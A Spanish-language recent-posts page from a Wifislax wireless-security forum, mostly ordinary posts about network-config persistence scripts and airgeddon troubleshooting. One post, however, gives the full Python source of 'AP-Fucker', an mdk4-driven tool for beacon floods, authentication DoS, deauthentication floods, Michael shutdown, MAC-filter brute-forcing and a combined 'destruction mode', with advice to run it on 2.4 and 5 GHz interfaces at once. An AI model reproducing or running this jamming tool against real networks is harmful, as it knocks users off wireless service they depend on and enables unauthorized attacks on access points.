Mensajes recientes

Páginas: [1] 2 3 4 5 6 7 8 ... 10
1
ok
luego te subo foto y me comenta
2
Live wifislax / Re:Persistencia de las conexiones de red (en live USB)
« Último mensaje por USUARIONUEVO en Hoy a las 16:43 »
seguro que le viene bien a mas de uno , yo siempre me hago un xzm con la conexion wifi ya hecha , asi en live , nada mas arrancar ya esta conectado.
3
Live wifislax / Persistencia de las conexiones de red (en live USB)
« Último mensaje por Zup en Hoy a las 14:08 »
Bueno, aquí va el script chorra del día..

FUNCIÓN: Hacer que la configuración de red sea más o menos persistente en live USB.
DESTINATARIOS: Todos aquellos que por diversas razones (redes sin DHCP, redes inalámbricas con claves complicadas) tengan que introducir la configuración de red cada vez que WifiSlax arranca.
INSTRUCCIONES DE USO:
- Configurar la red tal y como queramos usando NetworkManager.
- Ejecutar el script. La primera vez que lo ejecutemos, el script se copiará a si mismo y todos los perfiles de red a un módulo llamado network-config.xzm.
- A partir de ahora, cada vez que queramos añadir una nueva configuración de red, solo tendremos que ejecutar el script copy-network-config.sh que encontraremos en /root.
- Para quitar configuraciones de red que ya no nos sirvan, lo mismo... las quitas primero de NetworkManager y luego ejecutas el script.

EL SCRIPT:
Código: [Seleccionar]
# Crear directorio para el paquete y copiar script:
mkdir -p ~/network-config-pkg/root
cp $0 ~/network-config-pkg/root/copy-network-config.sh
chmod +x ~/network-config-pkg/root/copy-network-config.sh
cd ~/network-config-pkg

# Copiar configuraciones NetworkManager:
mkdir -p etc/NetworkManager/system-connections/
cp /etc/NetworkManager/system-connections/* etc/NetworkManager/system-connections/

# Copiar configuraciones WiFi:
# (No se copia nada, va incluida en NetworkManager)

# Crear paquete
makepkg -c y ../network-config.txz
cd ..
txz2xzm network-config.txz network-config.xzm

# Copiar paquete al directorio modules y borrar ficheros
cp network-config.xzm /mnt/livemedia/wifislax64/modules/
rm -rf network-config*
4
salu2

apfucker en interface 2.5ghz  tiene inundacion de paquetes qdos que esta obsoleto pero aun asi genera ruido ...usara mdk3

y copias pegas y renobras a apfucker2.py  y lo usas en interface 5ghz  selecciona opcion T destrucction en ambos  este usara mdk4
(nota para usar estos script antes se debe poner interfaces en modo monitor)
Código: [Seleccionar]
#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk4 installed
#

__app__ = "AP-Fucker"
__version__ = "0.5"
__author__ = "MatToufoutu"

### IMPORTS
from sys import stdout
from sys import exit as sysexit
from os import system, remove, path
from commands import getoutput
from threading import Thread
from time import sleep, ctime

### MDK4 THREADED ATTACKS CLASS
class Mdk4(Thread):
    def __init__(self, attack, attack_options):
        Thread.__init__(self)
        self.attack = attack
        self.iface = attack_options[0]
        self.essid = attack_options[1]
        self.bssid = attack_options[2]
        self.chan = attack_options[3]
        self.log = "apfucker.log"
        self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
                      "M":self.mich, "W":self.wids, "C":self.brutmac}
    def bflood(self):
        out = open(self.log,"a")
        out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
        out.close()
        print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
        sleep(2)
        system("mdk4 "+self.iface+" b -n "+self.essid+" -b g -w t -m -c "+self.chan+" -h >> "+self.log)
    def ados(self):
        out = open(self.log,"a")
        out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
        out.close()
        print("\n Launching Auth DoS against %s " % (self.bssid))
        sleep(2)
        system("mdk4 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
    def amok(self):
        out = open(self.log,"a")
        out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
        out.close()
        print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
        sleep(2)
        system("mdk4 "+self.iface+" d -c "+self.chan+" -E "+self.essid+" -B "+self.bssid+" -s 1024 >> "+self.log)
    def mich(self):
        out = open(self.log,"a")
        out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
        out.close()
        print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
        sleep(2)
        system("mdk4 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
    def wids(self):
        out = open(self.log,"a")
        out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
        out.close()
        print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
        sleep(2)
        system("mdk4 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
    def brutmac(self):
        global runanim
        runanim = True
        out = open(self.log, "a")
        out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
        print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
        sleep(2)
        macfound = getoutput("mdk4 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
        runanim = False
        sleep(1)
        print; print
        for line in macfound:
            print(line)
            out.write("\n"+line)
        out.close()
        print
        sysexit(0)
    def run(self):
        global runanim
        runanim = True
        self.modes[self.attack]()
        runanim = False

### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
    for line in getoutput("iwconfig "+iface).splitlines():
        if "Mode:Monitor" in line:
            return True
    return False

## CHECK IF BSSID IS VALID
def check_mac(ap):
    if len(ap) != 17 or ap.count(':') != 5:
        return False
    macchar = "0123456789abcdef:"
    for c in ap.lower():
        if macchar.find(c) == -1:
            return False
    return True

## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
    if chan.isdigit():
        channel = int(chan)
        if not channel in range(1, int(getoutput("echo '170'"))+1):
            return False
    else:
        return False
    return True

## CLEAN EXIT
def clean_exit():
    print;print
    print("\nAction aborted by user. Exiting now")
    for pid in getoutput("ps aux | grep mdk4 | grep -v grep | awk '{print $2}'").splitlines():
        system("kill -9 "+pid)
    print("Hope you enjoyed it ;-)")
    sleep(2)
    system("clear")
    sysexit(0)

## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
    try:
        stdout.write("\r | "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r / "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r-- "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r \\ "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r | "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r / "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r-- "+mess)
        stdout.flush()
        sleep(0.15)
        stdout.write("\r \\ "+mess)
        stdout.flush()
        sleep(0.15)
    except KeyboardInterrupt:
        clean_exit()

### MAIN APP
try:
    import psyco
    psyco.full()
except ImportError:
    pass

attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt = []

if getoutput("whoami") != "root":
    print("This script must be run as root !")
    sysexit(0)
try:
    system("clear")
    print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
    print("""Choose your Mode:
    \t - (B)eacon flood
    \t - (A)uth DoS
    \t - (W)ids confusion
    \t - (D)isassociation 'AmoK Mode'
    \t - (M)ichael shutdown exploitation
    \t - MA(C) Filter Brute-Forcer
    \t - Des(T)ruction mode (USE WITH CAUTION)\n""")

    ## GET MODE
    while 1:
        mode = raw_input("\n>>> ")
        if mode.upper() not in attackAvail:
            print("  '%s' is not a valid mode !" % mode)
        else:
            break

    ## GET INTERFACE
    while 1:
        iface = raw_input("\nMonitor interface to use: ")
        if check_mon(iface):
            attack_opt.append(iface)
            break
        else:
            print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)

    ## GET ESSID
    if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
        attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
    else:
        attack_opt.append(None)

    ## GET BSSID
    if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
        while 1:
            bssid = raw_input("\nTarget BSSID: ")
            if check_mac(bssid):
                attack_opt.append(bssid)
                break
            else:
                print("Invalid BSSID, try again or hit Ctrl+C to quit")
    else:
        attack_opt.append(None)

    ## GET CHANNEL
    if mode.upper() != "C":
        while 1:
            channel = raw_input("\nTarget channel: ")
            if check_chan(iface, channel):
                attack_opt.append(channel)
                break
            else:
                print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
    else:
        attack_opt.append(None)

    ## LAUNCH SELECTED ATTACK
    if path.exists("apfucker.log"):
        remove("apfucker.log")
    if mode.upper() != "T":
        system('clear')
        Mdk4(mode.upper(), attack_opt).start()
        sleep(1)
        print; print; print
        while runanim:
            waiter("   ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
    else:
        system('clear')
        print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
        print(" You've choosen DESTRUCTION MODE")
        print(" Using this mode may harm your WiFi card, use it at your own risks.")
        validate = raw_input(" Do you wish to continue? (y/N): ")
        if validate.upper() != "Y":
            print(" Ok, exiting now")
            sysexit(0)
        else:
            out = open("apfucker.log","a")
            out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
            out.close()
            print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
            print(" Please be kind with your neighbours xD")
            ##wids not implemented: may raise segfault
            ##appears to be an internal mdk4 issue when running multiple attacks
            for atk in ("B", "A", "D", "M"):
                Mdk4(atk, attack_opt).start()
            sleep(1)
            print; print; print
            while runanim:
                waiter("   DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
    clean_exit()


para un portal seria otra interface mas osea 3
5
Estoy igual que tu. Me uno a tu petición.
6
Filomeno, me estoy refiriendo a que te descargues la versión v10.41 que aún no ha salido. Por eso lo de poner el -b dev para descargar de la rama dev que es la de desarrollo (development) de github. Al arrancar airgeddon debe poner v10.41, si no, es que no tienes la correcta, la que te estoy diciendo que seguramente te va a funcionar. Mira bien el comando que puse!

Wil, no se que ataque estás lanzando... porque no das muchos detalles, solo que tienes errores. Me supongo que es un Evil Twin con portal cautivo... pero tengo malas noticias, la verdad es que no he visto ese error nunca... si dices que aparece en la ventana del webserver es que tienes algún problema en el paquete lighttpd que es el que levanta el servidor web del portal cautivo. Yo reinstalaría ese paquete. ¿Qué linux usas? ¿es wifislax? porque en wifislax no deberías tener ningún problema con eso pues ya viene preinstalado y funcionante.
7
pues me he bajado la ultima y es la mismita que usaba,
si la pusiste hace dias lo mismo ya me la baje
Código: [Seleccionar]
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
o sea que sigo con lo mismo ya te mandare capturas seguire probando

salu2
8
Foro libre - Offtopic / Re:Presentate aqui si eres nuevo
« Último mensaje por granfloren en Ayer a las 19:52 »
Ando haciendo mis pinitos en seguridad informatica y me he registrado al foro, saludos a todos!
9
hola mi pregunta para a el señor v1s1t0r.
cuando las 6 ventanilla se habre de airgedon
hay una que me pone esto

webserver
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400

como puedo solucionarlo?
10
Live wifislax / bajar la 2.4 de otro lado q no sea mega?
« Último mensaje por storax en Ayer a las 18:12 »
Alguien tiene un torrent o un link de mediafire para bajarlo, no logro bajarlo de mega.

gracias.
Páginas: [1] 2 3 4 5 6 7 8 ... 10